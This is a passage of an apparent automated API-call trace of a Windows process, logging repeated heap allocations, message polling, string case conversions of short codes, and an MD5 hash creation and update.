(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.944] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0255.944] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0255.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.945] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0255.945] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.945] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0255.945] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.945] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0255.945] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.945] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.945] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0255.946] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.946] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.946] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0255.946] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0255.946] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0255.946] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.946] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0255.947] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.947] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.947] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0255.947] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0255.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.947] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.947] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0255.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0255.948] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.948] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.948] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0255.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0255.948] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0255.948] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0255.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.949] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0255.949] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.949] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0255.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.949] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.950] CryptCreateHash (in: hProv=0xad2698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0255.950] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0255.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.950] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.951] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.951] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.951] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0255.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.952] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0255.952] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0255.953] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.953] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0255.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0255.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.953] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.953] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.953] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0255.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0255.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0255.954] CryptHashData (hHash=0xaa5920, pbData=0x24b1778, dwDataLen=0x3, dwFlags=0x1) returned 1 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.954] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0255.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0255.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0255.955] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.955] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0255.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0255.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0255.955] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.955] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0255.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.955] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.955] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.956] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0255.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.956] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0255.956] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.956] 